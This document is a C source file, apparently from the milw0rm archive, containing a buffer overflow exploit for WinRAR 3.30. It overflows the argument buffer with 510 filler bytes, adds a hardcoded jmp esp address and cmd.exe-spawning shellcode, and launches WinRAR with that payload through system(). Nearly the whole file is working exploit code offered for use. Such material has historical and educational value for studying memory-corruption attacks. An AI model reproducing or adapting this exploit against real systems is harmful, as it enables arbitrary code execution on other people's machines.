37 lines
No EOL
1.1 KiB
C
37 lines
No EOL
1.1 KiB
C
/* WinRAR Buffer Overflow 3.30 Exploit
|
|
*
|
|
* Bug founded by: Vredited By Alpha Programmer & Trap-Set U.H Team
|
|
* Exploit made by: K4P0
|
|
* Contact: k4p0k4p0@hotmail.com
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <windows.h>
|
|
|
|
int main(void)
|
|
{
|
|
char EvilBuff[1024];
|
|
|
|
// Normal cmd.exe shellcode.
|
|
char shellcode[] = "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63"
|
|
"\xC6\x45\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6"
|
|
"\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
|
|
"\xF8\x50\xBB\x44\x80\xBF\x77\xFF\xD3";
|
|
|
|
char jmpesp_offset[] = "\x0F\x98\xF8\x77";
|
|
char Prog[1024] = "WinRAR ";
|
|
|
|
printf("WinRAR Buffer Overflow 3.30 Exploit\n\n");
|
|
printf("Bug discovered by: Vredited By Alpha Programmer & Trap-Set U.H Team\n");
|
|
printf("Exploit made by: K4P0\n");
|
|
memset(EvilBuff, 0x00, 1024);
|
|
memset(EvilBuff, 0x41, 510);
|
|
strncat(EvilBuff, jmpesp_offset, 1024);
|
|
strncat(EvilBuff, shellcode, 1024);
|
|
strncat(Prog, EvilBuff, 1024);
|
|
printf("\nExploiting...\n");
|
|
system(Prog);
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2006-01-04]
|